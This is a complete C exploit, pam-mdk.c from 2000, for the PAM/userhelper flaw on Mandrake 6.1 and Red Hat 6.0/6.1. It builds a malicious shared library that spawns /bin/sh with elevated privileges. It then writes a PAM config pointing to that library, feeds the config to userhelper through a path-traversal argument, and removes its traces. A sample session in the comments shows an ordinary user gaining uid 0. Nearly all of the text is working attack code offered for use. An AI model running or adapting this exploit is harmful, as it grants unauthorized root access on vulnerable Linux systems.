PAM/userhelper exploit - Ported to Mandrake 6.1. Also works on Red Hat 6.0 and 6.1, gives uid 0.
60f084b01a6b90f83d4afb30f04c2890fc63b2a6583017757d8572b289e798b3
/*
* pam-mdk.c (C) 2000 Paulo Ribeiro
*
* DESCRIPTION:
* -----------
* Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its
* exploit (pamslam.sh) doesn't work on it (at least on my machine). So,
* I created this C program based on it which exploits PAM/userhelper
* and gives you UID 0.
*
* SYSTEMS TESTED:
* --------------
* Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.
*
* RESULTS:
* -------
* [prrar@linux prrar]$ id
* uid=501(prrar) gid=501(prrar) groups=501(prrar)
* [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk
* [prrar@linux prrar]$ ./pam-mdk
* sh-2.03# id
* uid=0(root) gid=501(prrar) groups=501(prrar)
* sh-2.03#
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
FILE *fp;
strcpy(argv[0], "vi test.txt");
fp = fopen("abc.c", "a");
fprintf(fp, "#include<stdlib.h>\n");
fprintf(fp, "#include<unistd.h>\n");
fprintf(fp, "#include<sys/types.h>\n");
fprintf(fp, "void _init(void) {\n");
fprintf(fp, "\tsetuid(geteuid());\n");
fprintf(fp, "\tsystem(\"/bin/sh\");\n");
fprintf(fp, "}");
fclose(fp);
system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");
system("chmod 755 abc.conf");
system("gcc -fPIC -o abc.o -c abc.c");
system("ld -shared -o abc.so abc.o");
system("chmod 755 abc.so");
system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");
system("rm -rf abc.*");
}
/* pam-mdk.c: EOF */
___________________________________